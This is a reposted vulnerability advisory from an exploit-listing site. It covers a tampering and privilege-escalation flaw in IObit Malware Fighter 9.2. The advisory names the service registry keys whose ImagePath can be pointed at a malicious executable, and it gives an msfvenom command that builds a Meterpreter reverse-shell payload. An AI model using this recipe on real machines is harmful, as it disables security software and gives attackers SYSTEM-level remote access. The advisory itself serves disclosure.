Advertisement






IObit Malware Fighter 9.2 Tampering / Privilege Escalation

CVE Category Price Severity
CVE-2022-28116 CWE-269 $5000 Critical
Author Risk Exploitation Type Date
Unknown High Local 2022-08-03
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.021 0.8

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022080023

Below is a copy:

IObit Malware Fighter 9.2 Tampering / Privilege Escalation
[+] Credits: Yehia Elghaly (aka Mrvar0x)    
[+] Website: https://mrvar0x.com/
[+] Source:  "https://mrvar0x.com/2022/08/02/multiple-endpoints-security-tampering-exploit/"

Vendor:
=============
www.iobit.com


Product:
===========
IObit Malware Fighter 9.2 

IObit Malware Fighter is an advanced malware & spyware removal utility that detects, removes the deepest infections, and protects the PC from various of potential malware, ransomware, cryptojacking, spyware, adware, trojans, keyloggers, bots, worms, and hijackers, etc. It includes the unique "Dual-Core" engine, driver-level technology and the heuristic malware detection.
Safebox can protect users from ransomware and allow users to lock their personal data with a password.


Vulnerability Type:
===================
Missing Tamper Protection
Incorrect Authorization

CVE Reference:
==============
N/A


Security Issue:
================
IObit Malware Fighter prior to version 9.2  installed on Microsoft Windows does not provide sufficient anti-tampering protection of services by users with Administrator privileges. This could result in a user disabling IObit Malware Fighter and the protection offered by it. Also It lead to Raised privilege to SYSTEM.

That can occurred by modifying a specific registry key.
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AdvancedSystemCareService15
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IMFservice
Change ImagePath path to a malicious executable.


Exploit/POC:
=============
Create malicious executable through msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o meta.exe

Modify (ImagePath) with the path of the malicious executable - Restart


Network Access:
===============
Local


Severity:
=========
High


[+] Disclaimer
The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

Mrvar0x

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum